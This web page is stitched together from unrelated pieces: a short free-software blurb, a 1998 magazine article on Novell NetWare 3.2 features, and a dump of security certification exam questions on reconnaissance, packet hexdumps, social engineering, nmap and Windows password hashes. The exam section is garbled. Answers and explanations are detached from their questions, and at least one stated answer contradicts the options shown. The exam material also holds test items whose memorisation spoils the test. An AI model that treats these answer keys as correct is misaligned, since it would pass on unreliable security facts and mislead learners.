M23 is a free software. Windows, Linux/Unix/BSD, Netware, and network. With other miscellaneous functions with programs or drivers that just go missing.
Sandy Stevens 01 Jul 1998 If it's not broken, why fix it? Thousands of NetWare 3 administrators have asked this question when considering whether or not to upgrade to intraNetWare. NetWare 3 continues to maintain significant customer loyalty and to add value to companies, as proven by an installed base of approximately 1.5 million servers worldwide. To address the needs of companies that have chosen not to upgrade to intraNetWare at this time, Novell has released NetWare 3.2, which provides both updates and enhancements for existing NetWare 3 servers. MORE RELIABLE AND EASIER TO MANAGE Whether you are planning to install a new NetWare 3.2 server or to upgrade from NetWare 3.11 or NetWare 3.12, you will find that NetWare 3.2 offers several features that make it worth the time and money.
(For more information about various NetWare 3.2 purchasing options, see '.) For example, NetWare 3.2 delivers the following features:. NetWare 3 updates. Year 2000 updates. Network management utilities.
Updated 32-bit client software. Two versions of Netscape Navigator. Two-user version of intraNetWare NETWARE 3 UPDATES For years, NetWare 3 administrators have faced a continuous deluge of updates, including patches; fixes; and LAN, WAN, and disk driver updates. Although these updates are available free through Novell's Support Connection World-Wide Web site , keeping track of these updates can be an enormous management task. Most NetWare 3 administrators have been forced to take a reactive approach to updates-first encounter a problem, and then see if an update is available to fix the problem. NetWare 3.2 offers a solution to this dilemma by providing all of the current updates in one convenient package. With NetWare 3.2, these updates are automatically applied, eliminating the need for you to locate and download updates as problems occur.
YEAR 2000 UPDATES You have probably heard a lot of horror stories about computer systems worldwide coming to a screeching halt on January 1, 2000 because these systems are not designed to support a four-digit date format. (For more information about the year 2000 problem, see 'Exterminating the Millennium Bug Before It Wreaks Havoc on Your Company's Network,' NetWare Connection, June 1998, pp. 8-20.) Fortunately, you don't need to worry about your company's NetWare network: Novell has conducted extensive product testing to validate that the latest versions of most of its products are year 2000 ready. (For more information about Novell's year 2000 efforts, see 'Novell's Project 2000: Making Novell's Products Year 2000 Ready,' NetWare Connection, June 1998, pp.
) However, Novell is providing optional year 2000 updates for some of its products, including NetWare 3. According to John Canfield, Novell's year 2000 marketing manager, these updates 'are not critical to the function of the operating system.
Most of the problems we found are date display issues for which we have released the updates.' To make it easy for you to apply the optional year 2000 updates for NetWare 3, Novell has included these updates with NetWare 3.2. Novell has also included its latest 32-bit client software, which is year 2000 ready. (See the ' section.) By simply upgrading to NetWare 3.2 and installing the updated 32-bit client software, your company's network will be year 2000 ready, as long as all of the hardware and software you use on the network is also year 2000 ready. You can download year 2000 updates for other Novell products, such as intraNetWare, NetWare for Small Business, and BorderManager, from Novell's Project 2000 web site (NETWORK MANAGEMENT UTILITIES In addition, NetWare 3.2 includes new network management utilities, making it easier for you to manage your company's network.
The following utilities are the most significant:. The Windows-based SYSCON utility. The CONFIG NetWare Loadable Module (NLM) and the NetWare Config Reader utility. Other useful utilities, such as the CRON NLM, the TBACKUP NLM, and the TCOPY NLM Windows-Based SYSCON Utility NetWare 3 administrators manage users and network resources through Novell's DOS-based SYSCON utility. Most experienced NetWare 3 administrators agree that this utility isn't too difficult to use, even if it is DOS based.
After you become familiar with the various menu options, you can move through the screens with lightning speed. Personally, I like the DOS-based version of the SYSCON utility, but I must admit that using a DOS-based utility in a world dominated by Windows seems somewhat archaic. To bring NetWare 3 up-to-date, Novell has included a Windows-based version of the SYSCON utility with NetWare 3.2. As shown in Figure 1, the Windows-based SYSCON utility provides a graphical, hierarchical view of your company's network, allowing you to manage any version of NetWare 3. Figure 1: The Windows-based SYSCON utility provides a graphical view of your company's network.
Although Figure 1 shows multiple NetWare 3 servers in a hierarchical view, don't be fooled: Like other versions of NetWare 3, NetWare 3.2 uses a flat-file bindery for storing network information, such as information about users, groups, and printers. In fact, you can see that the top of the hierarchical view in Figure 1 displays server objects, which contain users and groups at the same level-just as the bindery does.
Although the Windows-based SYSCON utility is bound by the limitations of the bindery, this utility offers several time-saving features over the DOS-based version: For example, the Windows-based SYSCON utility allows you to conveniently manage multiple NetWare 3 servers from a single GUI. Of course, to manage multiple NetWare 3 servers, you must be authenticated to each NetWare 3 server as the SUPERVISOR user or as a SUPERVISOR-equivalent user. The management options available in the Windows-based SYSCON utility are nearly identical to the management options available in the DOS-based version.
(See Figure 2.) However, the Windows-based SYSCON utility also allows you to perform some limited management tasks across NetWare 3 servers. For example, you can copy login scripts and configuration files to multiple NetWare 3 servers by using the Windows-based cut and paste features. You can also view user and server configuration information in separate windows simultaneously, and you can print user configuration information. (See Figure 3.) Figure 2: You can use the Windows-based SYSCON utility to manage user accounts and network resources on all of the NetWare 3 servers on your company's network. Figure 3: The Windows-based SYSCON utility allows you to view and print information about users. The Windows-based SYSCON utility does have one drawback: It does not offer any drag-and-drop capabilities-either within a single bindery or across NetWare 3 servers. In general, I find the Windows-based SYSCON utility to be intuitive and easy to use.
However, as mentioned earlier, you are still bound by the limitations of the bindery. One major limitation is that each NetWare 3 server has its own bindery that you must maintain independently of other NetWare 3 servers. As a result, you must perform redundant management tasks, such as creating and maintaining a separate user account on each NetWare 3 server a user must access. This limitation can be addressed only by Novell Directory Services (NDS).
So when redundant management tasks become overwhelming in a NetWare 3 environment, it is time to upgrade to intraNetWare or NetWare 5. CONFIG NLM and the NetWare Config Reader Utility As mentioned earlier, NetWare 3 administrators must constantly ensure that they have applied the latest updates to their NetWare 3 servers-a problem that Novell has solved by including all of the current updates with NetWare 3.2. NetWare 3 administrators must also keep track of the patch levels and NLM versions running on their NetWare 3 servers. Novell has solved this problem as well by including the CONFIG NLM and the NetWare Config Reader utility in NetWare 3.2. These utilities work together to gather and verify the patch levels and NLM versions on a NetWare 3 server.
These utilities then compare the configuration information to the latest configuration recommendations available from Novell and to other NetWare 3 servers on your company's network. When you run the CONFIG NLM at the server console, all of the NetWare 3 server's configuration information, including the patch levels and NLM versions running on this server, are written to a text file called CONFIG.TXT. Then the NetWare Config Reader utility uses this file, which is stored in the SYS:SYSTEM directory, to compare the server's configuration information with the latest configuration recommendations available from Novell. You can download these configuration recommendations from Novell's Support Connection web site by selecting the Download option from within the NetWare Config Reader utility. Figure 4 shows the NetWare Config Reader utility's analysis of a NetWare 3.12 server called HOU-TOMI.
In Figure 4, the STREAMS NLM is highlighted in red, which indicates that this NLM is out of date and should be updated. If any of the NLMs listed in the Patches window were out of date, these NLMs would also be highlighted in red. Figure 4: The NetWare Config Reader utility compares the server's configuration information with the configuration recommended by Novell. You could select the Suggestions tab in the NetWare Config Reader utility to view a summary of possible problems on the HOU-TOMI server and suggestions for how to fix these problems. For example, Figure 5 shows that the STREAMS NLM is out of date, that the latest NetWare 3.12 patch set needs to be loaded, and that a particular SET parameter should be modified. Figure 5: The NetWare Config Reader utility summarizes the possible problems on a NetWare 3 server and provides suggestions for fixing these problems. With the NetWare Config Reader utility, you could also view the HOU-TOMI server's entire CONFIG.TXT file, NCF and DOS files, volumes statistics, and information about which interrupts are currently being used.
In addition, you could compare the HOU-TOMI server's CONFIG.TXT file to the CONFIG.TXT file on another NetWare 3 server. As you can see, the CONFIG NLM and the NetWare Config Reader utility are valuable management tools, whether your company has one NetWare 3 server or 50. These utilities take the guesswork out of troubleshooting many common NetWare 3 problems. Other Useful Utilities Novell has also included other useful utilities with NetWare 3.2, including the CRON NLM, the TBACKUP NLM, and the TCOPY NLM.
The CRON NLM provides a quick and easy way to schedule server console commands, such as loading and unloading NLMs at specific times. For example, you could configure the CRON NLM to automatically load a backup NLM at 2 a.m. Daily and to automatically unload this NLM after the backup process is completed. You can even use the CRON NLM to shut down a NetWare 3 server at a specific time In addition, you can view all of the server console commands that you have scheduled using the CRON NLM. The schedule for each NetWare 3 server is stored in the CRONTAB file, which is located in the SYS:SYSTEM directory. Like the CRON NLM, the TBACKUP and the TCOPY NLM simplify network management tasks. These utilities allow you to back up and restore trustee assignments and inherited rights masks.
Far too often, trustee assignments and inherited rights masks are not properly backed up-a fact that many NetWare 3 administrators don't discover until they try to restore trustee assignments and inherited rights masks after a server failure or upgrade. With the TBACKUP NLM, you can back up the trustee assignments and inherited rights masks on a NetWare server. The TBACKUP NLM creates the TRESTORE.BAT file, which you can run later to restore these trustee assignments and inherited rights masks.
The TCOPY NLM, on the other hand, allows you to copy trustee assignments from one directory structure to another. This capability is especially useful when you are migrating data across NetWare 3 servers. UPDATED 32-BIT CLIENT SOFTWARE As mentioned earlier, NetWare 3.2 includes the latest 32-bit Novell client software:. intraNetWare Client 4.11 for Windows NT. intraNetWare Client 2.2 for Windows 95. intraNetWare Client 2.2 for DOS and Windows This client software offers some significant improvements over previous versions of Novell's client software: When you install the latest 32-bit client software, the first improvement you will notice is a significant increase in performance.
Because this client software is 32-bit enabled, you have faster access to network services and network resources. The latest 32-bit client software also offers increased performance through its support of Novell's packet burst technology, which allows the client software to transmit multiple packets across the network before requiring an acknowledgment from the recipient. In addition, this client software supports Novell's Large Internet Packet (LIP) technology, which decreases the number of packets transmitted across bridges and routers by enabling each packet to be larger than 512 bytes, thus enhancing throughput. In addition, the latest 32-bit client software is implemented as a set of NLMs, which replaces the Virtual Loadable Module (VLM) architecture that was used in older, 16-bit versions of Novell's client software. Using an NLM architecture makes the client software dynamic, modular, and portable. For example, the same NLM-based LAN drivers that you install on a NetWare 3 server can now be installed on workstations as well.
The latest 32-bit client software also offers a graphical login, rather than the cumbersome DOS-based login used with older, 16-bit versions of Novell client software. (See Figure 6.) With this graphical login, users can quickly and easily log in to NetWare 3 servers from within Windows. Figure 6: Novell's updated 32-bit client software offers a graphical login. Finally, the latest 32-bit client software offers an autoreconnect feature: If the network connection is temporarily lost, the client software automatically tries to reestablish a user's network connection, along with any associated drive and printer mappings.
Although these improvements are appealing, the thought of upgrading the client software on every workstation on your company's network can be disconcerting. The good news is that you don't have to upgrade every workstation: All client software that shipped with previous versions of NetWare 3 are fully backward compatible with NetWare 3.2. The even better news is that when you are ready to begin upgrading the client software, you can use NetWare 3.2's automatic client upgrade (ACU) feature to perform the upgrade process in a few easy steps. The ACU feature allows you to set up the necessary directories, configuration files, and login scripts so that the new client software is automatically installed on users' workstations when these users log in to a NetWare 3.2 server. TWO VERSIONS OF NETSCAPE NAVIGATOR In addition to offering Novell updates, utilities, and client software, NetWare 3.2 includes two versions of Netscape Navigator: Netscape Navigator 4.04 and Netscape Navigator 3.01, both of which support Windows NT, Windows 95, Windows 3.x, Macintosh on the Power PC processor, and Macintosh on the 68000 processor.
Since accessing the Internet has become a daily necessity for most users, offering a network operating system and a web browser in one package makes sense. When you purchase or upgrade to NetWare 3.2, you receive the number of Netscape Navigator user licenses that match the number of NetWare 3.2 user licenses you own. For example, if you purchased a 10-user version of NetWare 3.2, you would receive 10 Netscape Navigator user licenses. TWO-USER VERSION OF INTRANETWARE Finally, NetWare 3.2 includes a fully functional, two-user version of intraNetWare, which allows you to evaluate the benefits of intraNetWare and NDS.
This little gesture alone sends a strong message from Novell: Although you may not have chosen to upgrade to intraNetWare at this time, you might want to take a closer look at what you are missing. CONCLUSION With NetWare 3.2, Novell has done more than simply bundle existing software for resale. NetWare 3.2 provides many solid enhancements that make this product worth the cost and effort to upgrade.
And although you can download some of the NetWare 3.2 components (such as updates) from Novell's Support Connection web site, having all of these components on a single CD-ROM is extremely convenient. You will not only avoid the time-consuming task of figuring out what to download and where to download it from, but you will also be able to manage your company's network more easily. If you are looking for a good workgroup solution, you should seriously consider using NetWare 3.2. Because NetWare 3 has been on the market for more than 9 years and has 1.5 million servers installed, NetWare 3.2 is certainly a sure bet. For more information about NetWare 3.2, visit Novell's web site (You can also call 1-888-321-4272 or 1-801-228-4272.
Sandy Stevens is a freelance writer based in Salt Lake City, Utah. She is the coauthor ofNovell's Guide to NetWare Printing, Novell's Guide to Integrating IntranetWare and NT, andNovell's Guide to BorderManager, all of which are available from Novell Press. NetWare Connection,July 1998, pp. 14-21 Which NetWare 3.2 Purchasing Option Should You Choose?
Novell offers three purchasing options for NetWare 3.2. The purchasing option you choose depends on whether you are upgrading an existing NetWare 3 server and what version of NetWare 3 this server is currently running. Pricing NetWare 3.2 Enhancement Pack Available if you are upgrading from NetWare 3.12 to NetWare 3.2. Pricing is stratified on a per-server basis. The suggested retail price per-server is U.S. NetWare 3.2 Upgrade Available if you are upgrading from older versions of NetWare, such as NetWare 3.11, to NetWare 3.2.
The product includes the upgrade to NetWare 3.12 and the NetWare 3.2 Enhancement Pack. Pricing is stratified on a per-user basis. The suggested retail price for five to 10 users is U.S. New NetWare 3.2 Product Available if you are installing a new NetWare 3.2 server. This product includes NetWare 3.12 and the NetWare 3.2 Enhancement Pack. Pricing is stratified on a per-user basis.
The suggested retail price for five users is U.S. For detailed product and pricing information, visit Novell's World-Wide Web site (You can also call 1-888-321-4272 or 1-801-228-4272. NetWare Connection, July 1998, p.
The follows is an email header. What address is that of the true originator of the message?
Return-Path: Received: from smtp.com (fw.emumail.com 215.52.220.122. By raq-221-181.ev1.net (8.10.2/8.10.2. With ESMTP id h78NIn404807 for; Sat, 9 Aug 2003 18:18:50 -0500 Received: (qmail 12685 invoked from network.; 8 Aug 2003 23:25:25 -0000 Received: from (19.25.19.10. By smtp.com with SMTP Received: from unknown (HELO CHRISLAPTOP. By localhost with SMTP; 8 Aug 2003 23:25:01 -0000 From: 'Bill Gates' To: 'mikeg' Subject: We need your help! Date: Fri, 8 Aug 2003 19:12:28 -0400 Message-ID: MIME-Version: 1.0 Content-Type: multipart/mixed; boundary='-=NextPart000005201C35DE1.03202950' X-Priority: 3 (Normal. X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal A.
19.25.19.10 B. 51.32.123.21 C. 168.150.84.123 D.
215.52.220.122 E. Firewalk is an active reconnaissance network security tool that attempts to determine what layer 4 protocols a given IP forwarding device 'firewall' will pass. Firewalk works by sending out TCP or UDP packets with a TTL one greater than the targeted gateway. If the gateway allows the traffic, it will forward the packets to the next hop where they will expire and elicit an ICMPTIMEEXCEEDED message. If the gateway host does not allow the traffic, it will likely drop the packets and no response will be returned. You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe.
What caused this? Answer: D Explanation: The Nimda worm modifies all web content files it finds. As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby, infecting the browsing system. The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines and allow intruders the ability to execute arbitrary commands within the Local System security context on machines running the unpatched versions of IIS.
Jason's Web server was attacked by a trojan virus. He runs protocol analyzer and notices that the Trojan communicates to a remote server on the Internet. Shown below is the standard 'hexdump' representation of the network packet, before being decoded.
Jason wants to identify the trojan by looking at the destination port number and mapping to a trojan-port number database on the Internet. Identify the remote server's port number by decoding the packet? Port 1890 (Net-Devil Trojan) B.
Port 1786 (Net-Devil Trojan) C. Port 1909 (Net-Devil Trojan) D. Port 6667 (Net-Devil Trojan). ETHER: Destination address: 0000BA5EBA11 ETHER: Source address: 00A0C9B05EBD ETHER: Frame Length: 1514 (0x05EA) ETHER: Ethernet Type: 0x0800 (IP) IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0) IP: Precedence = Routine IP.0. = Normal Delay IP.0. = Normal Throughput IP.0. = Normal Reliability IP: Total Length = 1500 (0x5DC) IP: Identification = 7652 (0x1DE4) IP: Flags Summary = 2 (0x2) IP.0 = Last fragment in datagram IP.1.
= Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 127 (0x7F) IP: Protocol = TCP - Transmission Control IP: Checksum = 0xC26D IP: Source Address = 10.0.0.2 IP: Destination Address = 10.0.1.201 TCP: Source Port = Hypertext Transfer Protocol TCP: Destination Port = 0x1A0B TCP: Sequence Number = 97517760 (0x5D000C0) TCP: Acknowledgement Number = 78544373 (0x4AE7DF5) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x10:.A. = No urgent data TCP.1. = Acknowledgement field significant TCP.0. = No Push function TCP.0. = No Reset TCP.0.
= No Synchronize TCP.0 = No Fin TCP: Window = 28793 (0x7079) TCP: Checksum = 0x8F27 TCP: Urgent Pointer = 0 (0x0) An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application. Which of the following strategies can be used to defeat detection by a network-based IDS application? Create a SYN flood B. Create a network tunnel C. Create multiple false positives D.
Create a ping flood. You have discovered that an employee has attached a modem to his telephone line and workstation. He has used this modem to dial in to his workstation, thereby bypassing your firewall. A security breach has occurred as a direct result of this activity. The employee explains that he used the modem because he had to download software for a department project.
What can you do to solve this problem? Install a network-based IDS B. Reconfigure the firewall C.
Conduct a needs analysis D. Enforce your security policy. Joseph was the Web site administrator for the Mason Insurance in New York, who's main Web site was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the Web site.
One night, Joseph received an urgent phone call from his friend, Smith. According to Smith, the main Mason Insurance web site had been vandalized! All of its normal content was removed and replaced with an attacker's message 'Hacker Message: You are dead! ' From his office, which was directly connected to Mason Insurance's internal network, Joseph surfed to the Web site using his laptop.
In his browser, the Web site looked completely intact. No changes were apparent.
Joseph called a friend of his at his home to help troubleshoot the problem. The Web site appeared defaced when his friend visited using his DSL connection. So, while Smith and his friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make sense of this problem, Joseph decided to access the Web site using his dial-up ISP. He disconnected his laptop from the corporate internal network and used his modem to dial up the same ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser to reveal the following web page: H@cker Mess@ge: Y0u @re De@d!
After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and determined that every system file and all the Web content on the server were intact.
How did the attacker accomplish this hack? ARP spoofing B. SQL injection C. DNS poisoning D. Routing table injection. Jack Hacker wants to break into Brown Co.'
S computers and obtain their secret double fudge cookie ecipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co.
Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password 'just to double check our records'. Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'
S computers, to find the cookie recipe. This is an example of what kind of attack? Reverse Psychology B.
Social Engineering C. Reverse Engineering D. Spoofing Identity E. Faking Identity. To scan a host downstream from a security gateway, Firewalking: A.
Sends a UDP-based packet that it knows will be blocked by the firewall to determine how specifically the firewall responds to such packets B. Uses the TTL function to send packets with a TTL value set to expire one hop past the identified security gateway C. Sends an ICMP 'administratively prohibited' packet to determine if the gateway will drop the packet without comment.
Assesses the security rules that relate to the target system before it sends packets to any hops on the route to the gateway. While attempting to discover the remote operating system on the target computer, you receive the following results from an nmap scan: Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ ) Interesting ports on 172.121.12.222: (The 1592 ports scanned but not shown below are in state: filtered) Port State Service 21/tcp open ftp 25/tcp open smtp 53/tcp closed domain 80/tcp open http 443/tcp open https Remote operating system guess: Too many signatures match to reliably guess the OS. Nmap run completed - 1 IP address (1 host up) scanned in 277.483 seconds What should be your next step to identify the OS? Perform a firewalk with that system as the target IP B. Perform a tcp traceroute to the system using port 53 C. Run an nmap scan with the -v-v option to give a better output D.
Connect to the active services and review the banner information. A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database? An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database B.
An attacker submits user input that executes an operating system command to compromise a target system C. An attacker gains control of system to flood the target system with requests, preventing legitimate users from gaining access D. An attacker utilizes an incorrect configuration that leads to access with higher-than-expected privilege of the database. You may be able to identify the IP addresses and machine names for the firewall, and the names of internal mail servers by: A. Sending a mail message to a valid address on the target network, and examining the header information generated by the IMAP servers B. Examining the SMTP header information generated by using the -mx command parameter of DIG C. Examining the SMTP header information generated in response to an e-mail message sent to an invalid address D.
Sending a mail message to an invalid address on the target network, and examining the header information generated by the POP servers. Central Frost Bank was a medium-sized, regional financial institution in New York. The bank recently deployed a new Internet-accessible Web application. Using this application, Central Frost's customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business through a Web browser. John Stevens was in charge of information security at Central Frost Bank. After one month in production, the Internet banking application was the subject of several customer complaints. Mysteriously, the account balances ofmany of Central Frost's customers had been changed!
However, moneyhadn't been removed from the bank. Instead, money was transferred between accounts. 000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00.^.^.E. 010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A [email protected]. 020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10.P.u.P.
030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32 py.' .HTTP/1.1.2 040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20 00.OK.Via.1.0. 050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43 STRIDER.Proxy-C 060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection.Keep- 070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C Alive.Content-L 080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F ength.29674.Co 090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type.text 0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D /html.Server. 0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30.Microsoft 0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20.Date.Sun.25. 0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35 Jul.1999.21:45:5 0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61 1.GMT.Accept-Ra 0F0 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 4C 61 73 nges.bytes.Las 100 74 2D 4D 6F 64 69 66 69 65 64 3A 20 4D 6F 6E 2C t-Modified.Mon, 110 20 31 39 20 4A 75 6C 20 31 39 39 39 20 30 37 3A.19.Jul.1999.07: 120 33 39 3A 32 36 20 47 4D 54 0D 0A 45 54 61 67 3A 39:26.GMT.ETag: 130 20 22 30 38 62 37 38 64 33 62 39 64 31 62 65 31.' 08b78d3b9d1be1 140 3A 61 34 61 22 0D 0A 0D 0A 3C 74 69 74 6C 65 3E:a4a'. 150 53 6E 69 66 66 69 6E 67 20 28 6E 65 74 77 6F 72 Sniffing.(networ 160 6B 20 77 69 72 65 74 61 70 2C 20 73 6E 69 66 66 k.wiretap.sniff 170 65 72 29 20 46 41 51 3C 2F 74 69 74 6C 65 3E 0D er).FAQ.
180 0A 0D 0A 3C 68 31 3E 53 6E 69 66 66 69 6E 67 20.Sniffing. 190 28 6E 65 74 77 6F 72 6B 20 77 69 72 65 74 61 70 (network.wiretap 1A0 2C 20 73 6E 69 66 66 65 72 29 20 46 41 51 3C 2F.sniffer).FAQ.This.docu 1C0 6D 65 6E 74 20 61 6E 73 77 65 72 73 20 71 75 65 ment.answers.que 1D0 73 74 69 6F 6E 73 20 61 62 6F 75 74 20 74 61 70 stions.about.tap 1E0 70 69 6E 67 20 69 6E 74 6F 20 0D 0A 63 6F 6D 70 ping.into.comp 1F0 75 74 65 72 20 6E 65 74 77 6F 72 6B 73 20 61 6E uter.networks.an This packet was taken from a packet sniffer that monitors a Web server. This packet was originally 1514 bytes long, but only the first 512 bytes are shown here. This is the standard hexdump representation of a network packet, before being decoded. A hexdump has three columns: the offset of each line, the hexadecimal data, and the ASCII equivalent. This packet contains a 14-byte Ethernet header, a 20-byte IP header, a 20-byte TCP header, an HTTP header ending in two linefeeds (0D 0A 0D 0A) and then the data.
By examining the packet identify the name and version of the Web server? Apache 1.2 B. Linux WServer 2.3. Answer: B We see that the server is Microsoft, but the test designer didn't want to make it easy for you. So what they did is blank out the IIS 4.0. The key is in line '0B0' as you see: 0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30.Microsoft 49 is I, so we get II 53 is S, so we get IIS 2F is a space 34 is 4 2E is. 30 is 0 So we get IIS 4.0 The answer is B If you don't remember the ASCII hex to Character, there are enough characters and numbers already converted.
For example, line '050' has STRIDER which is 53 54 52 49 44 45 52 and gives you the conversion for the 'I:' and 'S' characters (which is '49' and '53'). Let's imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company B. How do you prevent DNS spoofing? Install DNS logger and track vulnerable packets B.
Disable DNS timeouts C. Install DNS Anti-spoofer D. Disable DNS Zone Transfer. You work as security technician at testking.net. While doing web application testing, you might be required to look through multiple web pages online which can take a long time. Which of the processes listed below would be a more efficient way of doing this type of validation? Use mget to download all pages locally for further inspection.
Use wget to download all pages locally for further inspection. Use get. to download all pages locally for further inspection.
Use get to download all pages locally for further inspection. Answer: B Wget is a utility used for mirroring websites, get doesn't work, as for the actual FTP command to work there needs to be a space between get and (ie. Get.), get; is just bogus, that's a C function that's written 100% wrong.
Mget is a command used from 'within' ftp itself, ruling out A. Which leaves B use wget, which is designed for mirroring and download files, especially web pages, if used with the -R option (ie.
Wget -R www.testking.net) it could mirror a site, all expect protected portions of course. Note: GNU Wget is a free network utility to retrieve files from the World Wide Web using HTTP and FTP and can be used to make mirrors of archives and home pages thus enabling work in the background, after having logged off. Answer: D Explanation: If the answer was A nmap would guess it, it holds the MS signature database, the host not being firewalled makes no difference.
The host is not linux or solaris, well it very well could be. The host is not properly patched? That is the closest; nmaps OS detection architecture is based solely off the TCP ISN issued by the operating systems TCP/IP stack, if the stack is modified to show output from randomized ISN's or if you're using a program to change the ISN then OS detection will fail. If the TCP/IP IP ID's are modified then OS detection could also fail, because the machine would most likely come back as being down. You have just received an assignment for an assessment at a company site. Company's management is concerned about external threat and wants to take appropriate steps to ensure security is in place.
Anyway, the management is also worried about possible threats coming from inside the site, specifically from employees belonging to different Departments. What kind of assessment will you be performing? Black box testing B. Black hat testing C. Gray box testing D. Gray hat testing E. White box testing F.
White hat testing. Answer: A Explanation: The question is not telling you what state the port is being reported by the scanning utility, if the program used to conduct this is nmap, nmap will show you one of three states - 'open', 'closed', or 'filtered' a port can be in an 'open' state yet filtered, usually by a stateful packet inspection filter (ie. Netfilter for linux, ipfilter for bsd). C and D do not make any sense for this question, they're bogus, and B, 'You cannot spoof + TCP', well you can spoof + TCP, so we strike that out. Answer: B Explanation: Okay, this is a tricky question.
We say B, DES, but it could be A 'MD4' depending on what they're asking - Windows 2000/XP keeps users passwords not 'apparently', but as hashes, i.e. Actually as 'check sum' of the passwords. Let's go into the passwords keeping at large.
The most interesting structure of the complex SAM-file building is so called V-block. It's size is 32 bytes and it includes hashes of the password for the local entering: NT Hash of 16-byte length, and hash used during the authentication of access to the common resources of other computers LanMan Hash, or simply LM Hash, of the same 16-byte length.
Algorithms of the formation of these hashes are following: NT Hash formation: 1. User password is being generated to the Unicode-line. Hash is being generated based on this line using MD4 algorithm. Gained hash in being encoded by the DES algorithm, RID (i.e. User identifier) had been used as a key.
It was necessary for gaining variant hashes for users who have equal passwords. You remember that all users have different RIDs (RID of the Administrator's built in account is 500, RID of the Guest's built in account is 501, all other users get RIDs equal 1000, 1001,1002, etc.). LM Hash formation: 1. User password is being shifted to capitals and added by nulls up to 14-byte length. Gained line is divided on halves 7 bytes each, and each of them is being encoded separately using DES, output is 8-byte hash and total 16-byte hash. Then LM Hash is being additionally encoded the same way as it had been done in the NT Hash formation algorithm step 3. In the context of using PKI, when Sven wishes to send a secret message to Bob, he looks up Bob's public key in a directory, uses it to encrypt the message before sending it off.
Bob then uses his private key to decrypt the message and reads it. No one listening on can decrypt the message.
Anyone can send an encrypted message to Bob but only Bob can read it. Thus although many people may know Bob's public key and use it to verify Bob's signature, they cannot discover Bob's private key and use it to forge digital signatures. What does this principle refer to?
Irreversibility B. Non-repudiation C. In an attempt to secure his 802.11b wireless network, Ulf decides to use a strategic antenna positioning.
He places the antenna for the access points near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the building's center.
There is a large parking lot and outlying filed surrounding the building that extends out half a mile around the building. Ulf figures that with this and his placement of antennas, his wireless network will be safe from attack. Which of the following statements is true?
With the 300 feet limit of a wireless signal, Ulf's network is safe. Wireless signals can be detected from miles away, Ulf's network is not safe. Ulf's network will be safe but only of he doesn't switch to 802.11a. Ulf's network will not be safe until he also enables WEP. John has scanned the web server with NMAP. However, he could not gather enough information to help him identify the operating system running on the remote host accurately.
What would you suggest to John to help identify the OS that is being used on the remote web server? Connect to the web server with a browser and look at the web page. Connect to the web server with an FTP client.
Telnet to port 8080 on the web server and look at the default page code. Telnet to an open port and grab the banner. Jack Hacker wants to break into testking's computers and obtain their secret double fudge cookie recipe. Jacks calls Jane, an accountant at testking pretending to be an administrator from testking. Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him 'just to double check our records'. Jane does not suspect anything amiss, and parts with her password. Jack can now access testking's computers with a valid user name and password, to steal the cookie recipe.
What kind of attack is being illustrated here? (Choose the best answer) A. Reverse Psychology B. Reverse Engineering C. Social Engineering D.
Spoofing Identity E. Faking Identity. Statistics from cert.org and other leading security organizations has clearly showed a steady rise in the number of hacking incidents perpetrated against companies. What do you think is the main reason behind the significant increase in hacking attempts over the past years?
It is getting more challenging and harder to hack for non technical people. There is a phenomenal increase in processing power. New TCP/IP stack features are constantly being added. The ease with which hacker tools are available on the Internet.
